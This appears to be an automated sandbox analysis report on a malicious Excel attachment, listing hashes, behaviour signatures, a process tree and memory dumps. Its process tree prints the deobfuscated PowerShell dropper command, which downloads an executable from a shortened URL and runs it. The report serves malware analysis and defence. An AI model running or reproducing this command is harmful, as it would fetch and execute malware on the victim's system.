Analysis

  • max time kernel
    69s
  • max time network
    15s
  • platform
    windows7_x64
  • resource
    win7v20201028
  • submitted
    13-03-2021 11:37

General

  • Target

    PO_371_50_37.xls

  • Size

    396KB

  • MD5

    dd94071fbb3459fb33069767de531441

  • SHA1

    5203fa48ba79e3626bcec7ecf3c1838c484760ef

  • SHA256

    d7a4a7c4bced1b93c3bf1252ef98ccfd1129452a675633349f5f98d3c968df37

  • SHA512

    d96e8fb052ffadee0961ff6fca2649066a81a02a3a4dee763e89d98b77cbd11faf15fa8a83b3c72e68d02284ee7dcd4a93f675a3f1da87a89d4c5f6a89fd64d8

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://bit.ly/2OQ9elm

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 9 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\PO_371_50_37.xls
    1⤵
    • Enumerates system info in registry
    • Modifies Internet Explorer settings
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:776
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe cmd /c powershell (NEw-objEct system.net.wEBclIenT).DownLoAdfIlE( ”https://bit.ly/2OQ9elm” , ”$ENv:TEMP\test1.exe” ) ; stARt-PRoCESs ”$ENv:TEMP\test1.exe”
      2⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1028

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/776-2-0x000000002FF11000-0x000000002FF14000-memory.dmp
    Filesize

    12KB

  • memory/776-3-0x0000000071371000-0x0000000071373000-memory.dmp
    Filesize

    8KB

  • memory/776-4-0x000000005FFF0000-0x0000000060000000-memory.dmp
    Filesize

    64KB

  • memory/1028-5-0x0000000000000000-mapping.dmp
  • memory/1028-6-0x0000000076071000-0x0000000076073000-memory.dmp
    Filesize

    8KB

  • memory/1028-7-0x000000006BF00000-0x000000006C5EE000-memory.dmp
    Filesize

    6.9MB

  • memory/1028-8-0x0000000000CD0000-0x0000000000CD1000-memory.dmp
    Filesize

    4KB

  • memory/1028-9-0x0000000004960000-0x0000000004961000-memory.dmp
    Filesize

    4KB

  • memory/1028-11-0x0000000004922000-0x0000000004923000-memory.dmp
    Filesize

    4KB

  • memory/1028-10-0x0000000004920000-0x0000000004921000-memory.dmp
    Filesize

    4KB

  • memory/1028-12-0x0000000001050000-0x0000000001051000-memory.dmp
    Filesize

    4KB

  • memory/1028-13-0x0000000005240000-0x0000000005241000-memory.dmp
    Filesize

    4KB

  • memory/1028-16-0x0000000005690000-0x0000000005691000-memory.dmp
    Filesize

    4KB

  • memory/1028-21-0x00000000060D0000-0x00000000060D1000-memory.dmp
    Filesize

    4KB

  • memory/1028-22-0x0000000006160000-0x0000000006161000-memory.dmp
    Filesize

    4KB

  • memory/1028-29-0x0000000006290000-0x0000000006291000-memory.dmp
    Filesize

    4KB

  • memory/1028-30-0x00000000062C0000-0x00000000062C1000-memory.dmp
    Filesize

    4KB

  • memory/1028-31-0x000000007EF30000-0x000000007EF31000-memory.dmp
    Filesize

    4KB

  • memory/1028-32-0x0000000006460000-0x0000000006461000-memory.dmp
    Filesize

    4KB

  • memory/1028-46-0x00000000065C0000-0x00000000065C1000-memory.dmp
    Filesize

    4KB

  • memory/1028-47-0x00000000065D0000-0x00000000065D1000-memory.dmp
    Filesize

    4KB